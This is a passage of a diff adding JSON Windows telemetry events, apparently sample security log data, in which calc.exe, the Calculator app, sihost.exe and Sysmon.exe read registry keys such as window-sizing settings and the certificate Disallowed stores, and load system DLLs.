"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", + "registry_value": "PreferredLaunchWindowingMode", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "image_load", + "image_name": "MrmCoreR.dll", + "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", + "registry_value": "Mode", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "process", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "terminate", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "twinui.dll", + "image_path": "C:\\Windows\\System32\\twinui.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 